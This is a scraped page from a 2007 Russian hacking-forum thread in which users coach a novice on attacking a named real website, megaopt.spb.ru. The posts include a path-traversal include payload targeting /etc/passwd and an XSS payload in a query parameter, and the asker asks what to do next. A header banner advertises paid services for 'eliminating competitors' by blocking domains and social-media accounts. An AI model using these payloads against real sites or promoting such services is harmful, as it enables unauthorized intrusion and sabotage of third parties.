УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Оффтоп > Болталка
Xss?

Страница 2 из 4

Опции темы

Поиск в этой теме

Опции просмотра

#11

17.12.2007, 17:04

159932

Постоянный

Регистрация: 28.09.2007

Сообщений: 820

Провел на форуме:
6722038

Репутация: 1385

зачем ещё !?!? мине хоть бы с этим разобраться

#12

17.12.2007, 17:07

NOmeR1

Познавший АНТИЧАТ

Регистрация: 02.06.2006

Сообщений: 1,188

Провел на форуме:
6023777

Репутация: 2642

Отправить сообщение для NOmeR1 с помощью ICQ

Include, Xss. Всё, что тебе нужно, ты сможешь сделать с сайтом, если конечно права есть и фильтрации нет.

#13

17.12.2007, 17:07

scrat

Постоянный

Регистрация: 08.04.2007

Сообщений: 853

Провел на форуме:
5812656

Репутация: 1540

Отправить сообщение для scrat с помощью ICQ

попробуй:

Код:

http://site.ru/nw/tmp.php?url=../../../../../../../../../etc/passwd%00&title=privet

#14

17.12.2007, 17:10

NOmeR1

Познавший АНТИЧАТ

Регистрация: 02.06.2006

Сообщений: 1,188

Провел на форуме:
6023777

Репутация: 2642

Цитата:

Сообщение от scrat

попробуй:

Код:

http://site.ru/nw/tmp.php?url=../../../../../../../../../etc/passwd%00&title=privet

Ну нахрен ему /etc/passwd? Он инклюд только первый раз видит. Тем более там ноль байтов не нужно.

#15

17.12.2007, 17:13

159932

Постоянный

Регистрация: 28.09.2007

Сообщений: 820

Провел на форуме:
6722038

Репутация: 1385

/etc/passwd не выводит ... а такой инклуд да я первый раз вижу ... я по скулю лучше

#16

17.12.2007, 17:13

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

там помойму ремоут инклуд =\

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

#17

17.12.2007, 17:14

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

ссылку дай лучше

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

#18

17.12.2007, 17:36

159932

Постоянный

Регистрация: 28.09.2007

Сообщений: 820

Провел на форуме:
6722038

Репутация: 1385

http://www.megaopt.spb.ru/nw/tmp.php?url=news.htm&title=1444

#19

17.12.2007, 17:47

freddi

Постоянный

Регистрация: 05.07.2006

Сообщений: 458

Провел на форуме:
2943499

Репутация: 807

http://www.megaopt.spb.ru/nw/tmp.php?url=news.htm&title=<img src=javascript:alert()>

#20

17.12.2007, 18:03

159932

Постоянный

Регистрация: 28.09.2007

Сообщений: 820

Провел на форуме:
6722038

Репутация: 1385

Цитата:

http://www.megaopt.spb.ru/nw/tmp.php?url=news.htm&title=<img src=javascript:alert()>

это я и сам обнаружил - но я всё никак понять не могу что дальше ???

Страница 2 из 4

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Xss без Xss	k00p3r	Чужие Статьи	5	08.09.2008 15:53
All xss	RetRon	Форумы	10	18.12.2005 21:54
Xss Расширенный межсайтовый скриптинг	SNIFF	Чужие Статьи	0	24.11.2005 08:08
Cross Site Scripting FAQ	k00p3r	Уязвимости	6	12.06.2005 16:23
XSS в Phorum<=5.0.14	tester2005	Уязвимости	22	17.03.2005 07:52

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход